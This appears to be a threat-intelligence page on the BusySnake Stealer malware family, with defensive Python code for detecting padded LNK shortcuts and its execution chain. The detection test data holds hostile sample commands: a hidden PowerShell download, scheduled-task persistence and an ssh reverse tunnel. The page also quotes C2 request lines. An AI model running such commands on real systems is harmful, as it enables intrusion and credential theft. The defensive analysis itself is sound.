Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The group leveraged the ZDI-CAN-25373 shortcut vulnerability to conceal the contents of their command line. This flaw allows the attackers to use spaces or line breaks to hide execution parameters. | The primary payload in this campaign is a previously undocumented, Python-based infostealer that we have dubbed BusySnake Stealer.
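The padding trick the quote describes is easy to check for on disk. The following parser is an added example (not code from this page or from the cited report): it walks the MS-SHLLINK layout of a .lnk file (fixed 76-byte header, optional LinkTargetIDList and LinkInfo, then the StringData fields) and measures how much leading whitespace sits in front of the real COMMAND_LINE_ARGUMENTS value, which is what makes the Properties dialog look empty. The threshold PAD_LIMIT is an assumption, and the shortcuts fed to it are constructed by build_lnk(), not real samples.

```python
"""Spot whitespace-padded command lines in Windows .lnk files.

Added example, not code from the page or the cited report. The
COMMAND_LINE_ARGUMENTS field is padded with spaces or line breaks so the
shell UI shows nothing suspicious; the real command sits past the padding.
PAD_LIMIT is an assumed threshold; sample shortcuts are constructed here.
"""
import struct

PAD_LIMIT = 64          # assumption: benign shortcuts do not carry this much leading whitespace
HEADER_SIZE = 0x4C      # ShellLinkHeader is always 76 bytes
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in this fixed order when their flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def _read_string(buf, off, unicode):
    """Read one StringData entry: 2-byte character count, then the characters."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    if unicode:
        text = buf[off:off + 2 * count].decode("utf-16-le")
        off += 2 * count
    else:
        text = buf[off:off + count].decode("cp1252", errors="replace")
        off += count
    return text, off


def parse_lnk_strings(buf):
    """Return the StringData fields of a ShellLink as a dict."""
    if len(buf) < HEADER_SIZE or struct.unpack_from("<I", buf, 0)[0] != HEADER_SIZE:
        raise ValueError("not a ShellLink header")
    if buf[4:20] != LINK_CLSID:
        raise ValueError("bad LinkCLSID")
    (flags,) = struct.unpack_from("<I", buf, 0x14)
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList
        (size,) = struct.unpack_from("<H", buf, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (4 bytes) counts itself
        (size,) = struct.unpack_from("<I", buf, off)
        off += size
    fields = {}
    for bit, name in STRING_FIELDS:
        if flags & bit:
            fields[name], off = _read_string(buf, off, bool(flags & IS_UNICODE))
    return fields


def scan_lnk_bytes(buf, limit=PAD_LIMIT):
    """Classify a shortcut by the amount of whitespace hiding its arguments."""
    fields = parse_lnk_strings(buf)
    args = fields.get("arguments", "")
    real = args.lstrip()                          # strips spaces, tabs, CR/LF, etc.
    padding = len(args) - len(real)
    return {
        "padded": padding >= limit,
        "padding": padding,
        "real_arguments": real,
        "target_hint": fields.get("relative_path") or fields.get("name", ""),
    }


def build_lnk(arguments, relative_path=None):
    """Construct a minimal Unicode .lnk with only the fields this detector reads (test data)."""
    flags = HAS_ARGUMENTS | IS_UNICODE
    body = b""
    if relative_path is not None:
        flags |= HAS_RELATIVE_PATH
        body += struct.pack("<H", len(relative_path)) + relative_path.encode("utf-16-le")
    body += struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    header = bytearray(HEADER_SIZE)
    struct.pack_into("<I", header, 0, HEADER_SIZE)
    header[4:20] = LINK_CLSID
    struct.pack_into("<I", header, 0x14, flags)
    return bytes(header) + body


if __name__ == "__main__":
    evil = build_lnk("\r\n" * 50 + " " * 200 + "/c start /min powershell -w hidden -enc AAAA",
                     relative_path="..\\..\\Windows\\System32\\cmd.exe")
    print(scan_lnk_bytes(evil))                    # padded, 300 characters of padding
    print(scan_lnk_bytes(build_lnk("/k echo hello")))
```

Run it over a mail gateway's extracted attachments or an EDR file-quarantine feed; anything with a large padding count and a cmd.exe/powershell.exe relative path is worth a closer look regardless of what the Properties dialog displays.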
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The group uses a previously undocumented tool, BusySnake Stealer. This stealer is written in Python and is designed to attack Windows systems.
33 distinct techniques documented for this family, organized by ATT&CK tactic.
Phishing remains one of the key initial-access vectors that the attackers actively use in their new campaigns. Armored Likho sends targeted emails... distributed malicious attachments in the form of archives...
Armored Likho uses spear-phishing emails, with themes ranging from official government notices to social programs. In their most recent campaign, the attackers distributed malicious attachments inside archive files... These archives contained executables or LNK files named to mimic the email themes, tricking users into executing them on their devices.
The second script, run.vbs, is intended to launch module.pyw and is used to establish persistence on the system by means of a scheduled task... This task ensures that the payload, BusySnake Stealer, is launched every five minutes.
The second script, run.vbs, is designed to execute module.pyw and is used to ensure persistence on the system by creating a scheduled task... This task ensures that the payload, BusySnake Stealer, is executed every five minutes.
Once launched, it executes an obfuscated command via rundll32, which results in a PowerShell command being run to download the stager.
When the user runs the malicious LNK file, it triggers the following obfuscated command... This, in turn, spawns a PowerShell command that downloads and executes the malicious loader.
With all dependencies in place, the malware creates two VBScript files... The second script, run.vbs, is designed to execute module.pyw and is used to ensure persistence on the system by creating a scheduled task
This stealer is written in Python... The Python 3.12 interpreter is then downloaded... Before the script is executed, the required dependencies are installed via pip. A new process is then started, and the script's code is executed directly in its memory without being written to disk.
The stealer’s source code implements multiple evasion techniques... Specifically, the BusySnake Stealer code is obfuscated and encrypted using PyArmor Pro version 9.2.0. The malware dynamically decrypts its bytecode only at the exact moment a function is called, re-encrypting the data immediately afterward.
Next, the legitimate file $temp\nsn5531.tmp\pnx.exe is written to disk and launched, after which code that starts the malicious loader is injected into the memory of the pnx.exe process.
Upon execution, the shortcut runs an obfuscated command via rundll32.exe, which subsequently triggers a PowerShell command to pull down the second-stage payload.
handle_split_and_send_tdata_command: Harvests Telegram session and credential data from the APPDATA/Telegram Desktop/tdata directory.
handle_collect_and_send_cookies: Extracts cookies from browser databases and uploads them to the C2 server... In addition to this method, the stealer fetches a supplementary module designed to extract cookies by installing a browser extension.
The remaining files are then checked: if a file has not been previously sent and its size does not exceed 5 MB, it is transmitted to the C2 server.
take_screenshot: Captures screenshots and saves them to the SCREEN_DIR directory... handle_send_screenshots_command: Captures screenshots at a designated interval, bundles them into an archive, and exfiltrates them to the C2 server.
Immediately after initialization, the start_key_clipboard_logger function begins harvesting data from the system clipboard. The malware polls the clipboard contents in an infinite loop
GET /get_task?... Host: 159.198.41.140 ... POST /report_status HTTP/1.1 ...
Updated endpoints ... /api/v1/client/{Config.CLIENT_ID}/commands/ ... /tasks/ ... /files/
handle_start_proxy_command ... Establishes a reverse SSH tunnel ... which provides remote access to and control over the compromised system.
handle_start_proxy_command / handle_stop_proxy_command: Establishes a reverse SSH tunnel using an SSH command and private key previously received from the C2 server.
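The technique cards above describe a chain that leaves distinctive process-creation telemetry: rundll32.exe spawning PowerShell when the shortcut is opened, a scheduled task that re-runs a .vbs/.pyw launcher every five minutes, pip installing dependencies for a freshly dropped Python 3.12 interpreter under a user-writable path, and ssh.exe opening a reverse tunnel. The rules below are an added example (not code from the page or the cited report) that evaluates those behaviours over constructed Sysmon-style records. The field names, the use of schtasks.exe to register the task (the report does not say how the task is created), and every path, host and argument in the sample events are assumptions.

```python
"""Flag the BusySnake execution chain in process-creation telemetry.

Added example; not code from the page or the cited report. Evaluates
constructed Sysmon-style records (image, parent_image, command_line).
Field names and the schtasks.exe assumption are the author's, not the
report's; the sample events are made up for the test.
"""
import ntpath
import re


def _base(path):
    """Lower-cased file name from a Windows path (works on any host OS)."""
    return ntpath.basename(path or "").lower()


def rule_rundll32_spawns_powershell(ev):
    """LNK stage: rundll32 is the parent of a PowerShell process."""
    return (_base(ev.get("parent_image")) == "rundll32.exe"
            and _base(ev.get("image")) in ("powershell.exe", "pwsh.exe"))


def rule_five_minute_script_task(ev):
    """Persistence: schtasks creating a 5-minute-interval task that runs a .vbs/.pyw launcher."""
    cmd = (ev.get("command_line") or "").lower()
    if _base(ev.get("image")) != "schtasks.exe" or "/create" not in cmd:
        return False
    return (re.search(r"/sc\s+minute\b", cmd) is not None
            and re.search(r"/mo\s+5\b", cmd) is not None
            and (".vbs" in cmd or ".pyw" in cmd))


def rule_pip_install_from_user_path(ev):
    """Staging: a dropped interpreter under AppData/Temp installing dependencies with pip."""
    img = (ev.get("image") or "").lower()
    cmd = (ev.get("command_line") or "").lower()
    return (_base(img) in ("python.exe", "pythonw.exe")
            and "pip" in cmd and "install" in cmd
            and ("\\appdata\\" in img or "\\temp\\" in img))


def rule_reverse_ssh_tunnel(ev):
    """Remote access: ssh.exe invoked with a remote (-R) port forward."""
    cmd = ev.get("command_line") or ""
    return (_base(ev.get("image")) == "ssh.exe"
            and re.search(r"(^|\s)-R\s*\S", cmd) is not None)


RULES = {
    "rundll32_spawns_powershell": rule_rundll32_spawns_powershell,
    "five_minute_script_task": rule_five_minute_script_task,
    "pip_install_from_user_path": rule_pip_install_from_user_path,
    "reverse_ssh_tunnel": rule_reverse_ssh_tunnel,
}


def evaluate(ev):
    """Names of every rule that fires on one record."""
    return [name for name, fn in RULES.items() if fn(ev)]


# Constructed events, not real telemetry; hosts use documentation ranges.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\rundll32.exe",
     "command_line": 'powershell -w hidden -c "iwr http://example.invalid/s -OutFile $env:TEMP\\s.exe"'},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": 'schtasks /create /sc minute /mo 5 /tn Update /tr "wscript C:\\Users\\u\\AppData\\Roaming\\run.vbs"'},
    {"image": r"C:\Users\u\AppData\Local\Temp\py312\python.exe",
     "parent_image": r"C:\Users\u\AppData\Local\Temp\nsn5531.tmp\pnx.exe",
     "command_line": "python.exe -m pip install pycryptodome pywin32"},
    {"image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "parent_image": r"C:\Users\u\AppData\Local\Temp\py312\pythonw.exe",
     "command_line": "ssh -N -R 0.0.0.0:2222:127.0.0.1:3389 -i C:\\Users\\u\\AppData\\Local\\Temp\\k u@198.51.100.7"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",   # benign control
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell -File C:\\scripts\\backup.ps1"},
]


def run_rules(events=SAMPLE_EVENTS):
    """(index, fired rules) for each event; the benign control fires nothing."""
    return [(i, evaluate(ev)) for i, ev in enumerate(events)]


if __name__ == "__main__":
    for idx, hits in run_rules():
        print(idx, hits or "-")
```

Each rule is deliberately narrow so it can be tuned independently; in a real pipeline the five-minute-task rule would also consume Windows Security event 4698 task XML, since the task may be registered through COM rather than schtasks.exe.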
41 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A Python-based infostealer for Windows used by Armored Likho. It establishes persistence via scheduled tasks and VBScript launchers, steals clipboard data, inventories files, extracts 64-character hexadecimal keys, captures screenshots, exfiltrates documents, decrypts Chromium and Firefox passwords, steals cookies, searches for 2FA secrets and wallet files, harvests Telegram session data, and can establish reverse SSH tunnels and execute remotely delivered Python scripts in memory.
Python-based Windows stealer used in phishing-driven intrusions. It establishes persistence via scheduled tasks/VBS, inventories files, steals clipboard data, screenshots, browser passwords and cookies, Telegram session data, OTP secrets, wallet files, and can receive C2 commands including reverse SSH tunneling and remote-control support.